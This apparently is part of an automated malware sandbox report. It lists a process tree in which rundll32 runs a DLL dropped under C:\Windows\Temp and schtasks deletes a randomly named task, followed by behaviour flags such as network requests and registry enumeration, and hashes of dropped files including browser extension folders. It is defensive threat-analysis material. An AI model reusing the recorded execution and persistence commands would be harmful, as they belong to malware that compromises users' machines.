C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\ueHXonDf\ykchFyH.dll",#1 /Hzsite_idZDO 3851181⤵PID:400
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\ueHXonDf\ykchFyH.dll",#1 /Hzsite_idZDO 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2136 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IypqguOSOyxhMfXuI"3⤵PID:4108
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55941fefac6fd4c7a0585ec7a11a136fb
SHA1280976d2c74e9700f947958c065bd88b71fabb27
SHA256df7b3b41c228c6e37e330fc24a76734927d4d1ff8c4fd8c79e3e2562b7f21d13
SHA5125813b12d10429f949a2521781c2aa8a0ebb7b655cd4fb96765b8a1f57399b1addb02f2c067ff1e6f91260300715485d032c453f0b74e43b72a6b32b173449ecd
-
Filesize
2KB
MD591ff705939d2982a1fa2167f066b934e
SHA1e8efb8e176cc9a07eb4b7e460fcb0efe17a7ee6c
SHA2568db9e3d47352445f66c11917e7bf041a6077ab0cab1d196909ac1702b667be18
SHA512db9e418f275469a43fc68afa9cc19be6418bb7f94dd0efda6c758b783d554620916120b0395add89d815142682ea466a1dead3335d1888da09c34af0818abd19
-
Filesize
2KB
MD589319b664c6921bd46bd2568e7eb517c
SHA1e9c8be00da3af0c747575919ad713c8213e3d478
SHA2563354f501d9fc20952eb10adb713dfdd4a16dd7daf5cbc6e032fdfed9680429da
SHA512c5e0d5fb8563b5fada7d4433c520b24e27d268fe457ea8016edcc934d06fc6c8cb6a87b40ec56958fedc20d7d2f2acec8fcce14a8aebe23572ea1ecc60be1816
-
Filesize
2KB
MD5505253fd0e2a0164b5598c8578449aac
SHA13d71b3689267cedc7686d8cb83e4817a8745d96e
SHA256ee20ce6b445d0eb97c751e7c063d589a00a896e289072bb531cd0916ba9acfcf
SHA512db7f8b4dd5fac1f75f035922f66a4159e1a3480c4391e823d7d65337419e9b87904b373ac27cf7c07a19db3cc92180e245b9342517be848cd19743559af2b154
-
Filesize
2.0MB
MD52dd0e7f20afe8e51332134a0fa04d3be
SHA19edb92b5f9ba135395329735b16157c873048927
SHA256815e44d70e100db95e80e67e022e0e747e2b712588ff7cd449f6550b22cbf6e8
SHA512e1dfc7a388295b6f234c33633b33a0db2a0111f2a033136281fb66643ca76fec71dad9f6d439b9414fe541b0746d1956670ca4c9b1a1e290786cebdff4f43371
-
Filesize
2KB
MD5680f98962b5d9672bf33c367a02d6949
SHA1f9aa990529457005acdda556e1589bfed61af812
SHA2568f91e40bcc5d41d06dd2dd789bb55cfb4617638a2e356962f8a49e798819b7b8
SHA5120cdff481c2a51ee86add8499b1c19abcbdb200c9a2860a32655e3bc18254e3367c0c6ca54f92ceecafe97c215eab3a6d025a89a2a7c9c12fb1d8ae81b38571c2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5d43765493c8be40f07a9237f2e361d58
SHA1a1773b10b5f0d37af44b1ce36c8d0a1a0c2ca322
SHA256144fee1b08882359f7e6f0f6095b8818065484e3066557021e667838671dc4fc
SHA512735e557f95410b3d015b19bfd372febdc54cee6b839fb7da7602add2228485d6f18162814fe34a992b430e820e444fb8bd07c489fc288df0ba60f45d876d9c7e
-
Filesize
35KB
MD5c9da3eb9e09f982085dae8819ac5e4e2
SHA1e00742abfd55e3f32dad71c3ada57767c3519fe0
SHA256b6efa42095845f958570bacde410e1efca289f188957aebf4f2b604c3647c721
SHA512e27e9708bc93d339a513622bf8b9e14157d4c8eabe229acc97946bceb138d492c6dd4fa1943030e3511a226f60ae4436a1181272e6f201d1dc5b2ff5ac58ae19
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5405247b78d7ffba9338bf076cc9582ee
SHA104553bce017a0634bd9a59e2e3e90fc2831a797c
SHA256b826f7f4200fc6111f5fcb876ae8dc2a7aea4a2198a48a395458d0abcc51b54f
SHA512912808b5dcca86f64b7f5d59feff11f0f80bc206802953bf83233924370efce42e6b09a65eec129f063b6104108d756afd59b5fc67d52a61f6a606e95e38815d
-
Filesize
6.7MB
MD516ae562d94dcce83d2cd6da34596833d
SHA1b6f1087b5f791713001ad414543ba9fa3c12f884
SHA2566fb9d6c67c662830e76ae56dd13ba80fcc60ba2a1af0307776dfce30b995683a
SHA512aa440fd88c57d54b54173c998d02509f4363620fafaaa3907e162a01de61012611bdd4f6e3c7dce525225ae697c54ed6cd35b140d40fcfc76087b9b4fa2b5d87
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5133035e8b83c71c4f3d6a4e8610a0cd1
SHA13ba96a69e452610fff9fd4c9f447f9dfa202dbc6
SHA2567ba1388ffd81776a77a062eb2059cd132dd4e1fc3bcc002d5b6fc23731b14d49
SHA512628adb5fc7007a72c188c41fea3f29ec7f03e2fafd3adbf0077423a64a367f1345c9b335548ae378f44f6519f60ecd51bb241d334fa211b2cd53c72af4aeb2ee
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD55b74da6778ccaa0e1ca4ae7484775943
SHA10a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA51220b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD510e85a4f068520bad0dd794d403fb9ce
SHA1bbbf8c3804d745433913b2a8e5761af32e4cfa1a
SHA25604ee7ee9c925eb0e0ef861893eacdba53d2257254a25ee8b21bc78581d668988
SHA512457fa16f0095b6324d46e514d51a4d5ea2fad6cb09832ca73569f3c6c0214501834f8b8d054b0800a3ee16124a8687068f889f7b75b9c118f8626903c25bea15
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD59afd8991a49bf434037b766cfd39fee5
SHA124e2b024e96ac803bf730c51cf5059e18aff7194
SHA256cf010dab71bfd76380e696f4e7369d652ceca62429ee10fab57d0eb3a72d0d96
SHA512a22eb914899577ab0285c7c2cbcf329ddca5c20f8ccba4e94578cea0d006b5f516255f385e12ee313b7d8bce9a29142102f26ab4affbdc163015542c8e0837ea
-
Filesize
6.4MB
MD57e7d1734fa1d84d40a690218aa21a449
SHA16648a3e46a62c4f81fa68e58b645d390bc80534a
SHA256c4989b8f312865d911df20e27445f3371d90c1e5f89f0bec54329527f16360b8
SHA512f2d6bca7dd5d94dd2eb3f4633161e745c1f6036a0dd275fd3ddfccb4975ef0598a0579324ffd5dc3a320b1e0e33698b8d4e3f7d185cabf6a6b6ec6a853258f76
-
Filesize
6KB
MD5b2865e186121a2b7eeedff1c3d6e89a3
SHA17794ff3dda1fe3715aed6039abaf96025fcda95d
SHA256b8157cc068c8ce6f196fccc5319dac7e1e19cf4310916ef1abaa035c184d9d11
SHA5122c05acfe45bb77568a41ee34370c69346722b64caf4d98ed2493f7a4f9ce91020e9473b9ffbefa35ba55e9585e2a555618ca19f41a9b689b461e700a2975e9c6